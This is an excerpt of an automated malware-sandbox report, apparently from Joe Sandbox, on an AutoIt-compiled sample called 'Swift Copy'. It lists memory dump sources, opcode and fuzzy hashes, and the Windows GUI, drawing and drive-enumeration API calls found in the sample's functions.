                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                              • Instruction ID: 523720df83cacd5d9d09950760c1644f8d96c0c465471a39caffe4a79f28c395
                                              • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                              • Instruction Fuzzy Hash: D991467A6090A34ADF2D463E857407EFFE15A923A131E079DE4F2CA1C5FE24D958D630
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                              • Instruction ID: fcb1c9aeca6dcf3a3b317a95c8989a25647f3047a50896d0f3fecf36c6309d51
                                              • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                              • Instruction Fuzzy Hash: 5791437A2090A34EDF2D467A857403EFFE15A923A671E079ED4F2CA1C1FE24C959D630
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3109ff2ee8ca8b4f02b99ee37771e57db9210a8cdb1c2818b1b9299f24cd1666
                                              • Instruction ID: 067b2f85ffc0886e42d0094e3538fcd00a6418302e68eb8c5fd1c59ff3df0d08
                                              • Opcode Fuzzy Hash: 3109ff2ee8ca8b4f02b99ee37771e57db9210a8cdb1c2818b1b9299f24cd1666
                                              • Instruction Fuzzy Hash: A1618B7173870966DF389A2C8C95BBF2395EF41708F1C091AE88BDB291D611DE42C375
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d0e231398b0a1d00aeb16456faa4623df0093474ba6e9f44a736c14a0461fdc2
                                              • Instruction ID: c955a02a379474026366efc8d34eac10ebdf72ccba8ed674d3f47d86313c567a
                                              • Opcode Fuzzy Hash: d0e231398b0a1d00aeb16456faa4623df0093474ba6e9f44a736c14a0461fdc2
                                              • Instruction Fuzzy Hash: 08615A7173870AE7DF385A288855BBF2394EF42704F1C0959F983DB281EA12DD429375
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                              • Instruction ID: b3db60f6c9e26dbe9543f9f396afb080d5d352951cebb86f5f88d4bea8ff4ab5
                                              • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                              • Instruction Fuzzy Hash: C881757A6090A35DDF6E427A853443EFFE15A923A131E079ED4F2CB1C1EE24D558EA30
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1678475420.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ed0000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                              • Instruction ID: 41af34196b7553c5eda9af411f51f4051088a107830d135d98e763ff53e73c48
                                              • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                              • Instruction Fuzzy Hash: 5541A3B1D1051CEBCF48CFADC991AAEBBF1AF88201F548299D516AB345D730AB41DB50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1678475420.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ed0000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                              • Instruction ID: 52ef7d3d859f8ae6978cc9a7caa5d5a5fd8662a8f64444c0d55425a7c41fb15d
                                              • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                              • Instruction Fuzzy Hash: 86019278A01109EFCB44DFA8C5909AEF7F5FB48310F20859AE819A7701D734AE42DB81
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1678475420.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ed0000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                              • Instruction ID: 6f786e5618da6c168ae75b2785bad2f35be7cad4ce3ddaf80656e4ba8b1cad4a
                                              • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                              • Instruction Fuzzy Hash: 64019278A00109EFCB44DFA8D5909AEF7F5FB48310F20869AE819A7701D730AE42DB81
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1678475420.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ed0000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                              • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                              • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                              • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 00DF2B30
                                              • DeleteObject.GDI32(00000000), ref: 00DF2B43
                                              • DestroyWindow.USER32 ref: 00DF2B52
                                              • GetDesktopWindow.USER32 ref: 00DF2B6D
                                              • GetWindowRect.USER32(00000000), ref: 00DF2B74
                                              • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00DF2CA3
                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00DF2CB1
                                              • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2CF8
                                              • GetClientRect.USER32(00000000,?), ref: 00DF2D04
                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00DF2D40
                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2D62
                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2D75
                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2D80
                                              • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2D89
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2D98
                                              • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2DA1
                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2DA8
                                              • GlobalFree.KERNEL32(00000000), ref: 00DF2DB3
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2DC5
                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00E0FC38,00000000), ref: 00DF2DDB
                                              • GlobalFree.KERNEL32(00000000), ref: 00DF2DEB
                                              • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00DF2E11
                                              • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00DF2E30
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2E52
                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF303F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                              • String ID: $AutoIt v3$DISPLAY$static
                                              • API String ID: 2211948467-2373415609
                                              • Opcode ID: f9c69c84fec21cd2fd762d7c7bb118468bf4d5b0b14ac52b06e90514f443ff37
                                              • Instruction ID: dd00cd08bd637835c9499ba2ad0ce9f35244b10c9ff835e2b62b02f92aaefc34
                                              • Opcode Fuzzy Hash: f9c69c84fec21cd2fd762d7c7bb118468bf4d5b0b14ac52b06e90514f443ff37
                                              • Instruction Fuzzy Hash: 78029B71900208AFDB14DFA5CC89EBE7BB9EF48710F148258F915AB2A1DB31AD45CB70
                                              APIs
                                              • SetTextColor.GDI32(?,00000000), ref: 00E0712F
                                              • GetSysColorBrush.USER32(0000000F), ref: 00E07160
                                              • GetSysColor.USER32(0000000F), ref: 00E0716C
                                              • SetBkColor.GDI32(?,000000FF), ref: 00E07186
                                              • SelectObject.GDI32(?,?), ref: 00E07195
                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00E071C0
                                              • GetSysColor.USER32(00000010), ref: 00E071C8
                                              • CreateSolidBrush.GDI32(00000000), ref: 00E071CF
                                              • FrameRect.USER32(?,?,00000000), ref: 00E071DE
                                              • DeleteObject.GDI32(00000000), ref: 00E071E5
                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 00E07230
                                              • FillRect.USER32(?,?,?), ref: 00E07262
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E07284
                                                • Part of subcall function 00E073E8: GetSysColor.USER32(00000012), ref: 00E07421
                                                • Part of subcall function 00E073E8: SetTextColor.GDI32(?,?), ref: 00E07425
                                                • Part of subcall function 00E073E8: GetSysColorBrush.USER32(0000000F), ref: 00E0743B
                                                • Part of subcall function 00E073E8: GetSysColor.USER32(0000000F), ref: 00E07446
                                                • Part of subcall function 00E073E8: GetSysColor.USER32(00000011), ref: 00E07463
                                                • Part of subcall function 00E073E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E07471
                                                • Part of subcall function 00E073E8: SelectObject.GDI32(?,00000000), ref: 00E07482
                                                • Part of subcall function 00E073E8: SetBkColor.GDI32(?,00000000), ref: 00E0748B
                                                • Part of subcall function 00E073E8: SelectObject.GDI32(?,?), ref: 00E07498
                                                • Part of subcall function 00E073E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00E074B7
                                                • Part of subcall function 00E073E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E074CE
                                                • Part of subcall function 00E073E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00E074DB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                              • String ID:
                                              • API String ID: 4124339563-0
                                              • Opcode ID: da44bee85f64c9cd3493878822728bf7a6cbbb1bf5b7ba1684457c567ea9d81f
                                              • Instruction ID: 39c64b8435c828e1df104e01203b23ebb88e18eb7c55f6203d638aac5986ea1b
                                              • Opcode Fuzzy Hash: da44bee85f64c9cd3493878822728bf7a6cbbb1bf5b7ba1684457c567ea9d81f
                                              • Instruction Fuzzy Hash: C9A1A172409301AFDB119F61DC48E5B7BA9FF49320F201B19F9A2B61E1D732E988CB51
                                              APIs
                                              • DestroyWindow.USER32(?,?), ref: 00D88E14
                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 00DC6AC5
                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00DC6AFE
                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00DC6F43
                                                • Part of subcall function 00D88F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D88BE8,?,00000000,?,?,?,?,00D88BBA,00000000,?), ref: 00D88FC5
                                              • SendMessageW.USER32(?,00001053), ref: 00DC6F7F
                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00DC6F96
                                              • ImageList_Destroy.COMCTL32(00000000,?), ref: 00DC6FAC
                                              • ImageList_Destroy.COMCTL32(00000000,?), ref: 00DC6FB7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                              • String ID: 0
                                              • API String ID: 2760611726-4108050209
                                              • Opcode ID: 76907d44ef800cfd5ac7a9c849f31d1f2dfee90f0d40d12c571c318681b971dc
                                              • Instruction ID: fc1fb732000afdebf67ace67b51d8523aa81fde835b653a384e0ec57e9cd3654
                                              • Opcode Fuzzy Hash: 76907d44ef800cfd5ac7a9c849f31d1f2dfee90f0d40d12c571c318681b971dc
                                              • Instruction Fuzzy Hash: 3E129C34200202AFDB25DF24C944FA5BBE5FF49301F58856DF5859B261CB32EC96DB61
                                              APIs
                                              • DestroyWindow.USER32(00000000), ref: 00DF273E
                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00DF286A
                                              • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00DF28A9
                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00DF28B9
                                              • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00DF2900
                                              • GetClientRect.USER32(00000000,?), ref: 00DF290C
                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00DF2955
                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00DF2964
                                              • GetStockObject.GDI32(00000011), ref: 00DF2974
                                              • SelectObject.GDI32(00000000,00000000), ref: 00DF2978
                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00DF2988
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DF2991
                                              • DeleteDC.GDI32(00000000), ref: 00DF299A
                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00DF29C6
                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 00DF29DD
                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00DF2A1D
                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00DF2A31
                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 00DF2A42
                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00DF2A77
                                              • GetStockObject.GDI32(00000011), ref: 00DF2A82
                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00DF2A8D
                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00DF2A97
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                              • API String ID: 2910397461-517079104
                                              • Opcode ID: 370982493c0439fbb3b1867b86def3a5369073d6d253c0c9c90f1d6b1285e2fa
                                              • Instruction ID: 6e46e45d9b3c83a3f2cb7a4a70f417117b866a1e4dd0dae970d131dfd8a16db2
                                              • Opcode Fuzzy Hash: 370982493c0439fbb3b1867b86def3a5369073d6d253c0c9c90f1d6b1285e2fa
                                              • Instruction Fuzzy Hash: 63B16C75A00209AFEB14DFA9CC49FAE7BB9EB08710F118255FA14E7290D770AD45CBA0
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00DE4AED
                                              • GetDriveTypeW.KERNEL32(?,00E0CB68,?,\\.\,00E0CC08), ref: 00DE4BCA
                                              • SetErrorMode.KERNEL32(00000000,00E0CB68,?,\\.\,00E0CC08), ref: 00DE4D36
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ErrorMode$DriveType
                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                              • API String ID: 2907320926-4222207086
                                              • Opcode ID: 5764afa8cb5a9a2179cfeca65f19b1c6bda346f47fe417ae7ce42c5798c92ad1
                                              • Instruction ID: a49c4dcf30ef46d87d334518ad223986c0b847af5b39f642b42e7e8639917527
                                              • Opcode Fuzzy Hash: 5764afa8cb5a9a2179cfeca65f19b1c6bda346f47fe417ae7ce42c5798c92ad1
                                              • Instruction Fuzzy Hash: 2B61A330605245ABCB04FF26C986969BBB1EF44304F38D415F84ABB691EB36ED41DB71
                                              APIs
                                              • GetSysColor.USER32(00000012), ref: 00E07421
                                              • SetTextColor.GDI32(?,?), ref: 00E07425
                                              • GetSysColorBrush.USER32(0000000F), ref: 00E0743B
                                              • GetSysColor.USER32(0000000F), ref: 00E07446
                                              • CreateSolidBrush.GDI32(?), ref: 00E0744B
                                              • GetSysColor.USER32(00000011), ref: 00E07463
                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E07471
                                              • SelectObject.GDI32(?,00000000), ref: 00E07482
                                              • SetBkColor.GDI32(?,00000000), ref: 00E0748B
                                              • SelectObject.GDI32(?,?), ref: 00E07498
                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00E074B7
                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E074CE
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00E074DB
                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E0752A
                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00E07554
                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00E07572
                                              • DrawFocusRect.USER32(?,?), ref: 00E0757D
                                              • GetSysColor.USER32(00000011), ref: 00E0758E
                                              • SetTextColor.GDI32(?,00000000), ref: 00E07596
                                              • DrawTextW.USER32(?,00E070F5,000000FF,?,00000000), ref: 00E075A8
                                              • SelectObject.GDI32(?,?), ref: 00E075BF
                                              • DeleteObject.GDI32(?), ref: 00E075CA
                                              • SelectObject.GDI32(?,?), ref: 00E075D0
                                              • DeleteObject.GDI32(?), ref: 00E075D5
                                              • SetTextColor.GDI32(?,?), ref: 00E075DB
                                              • SetBkColor.GDI32(?,?), ref: 00E075E5
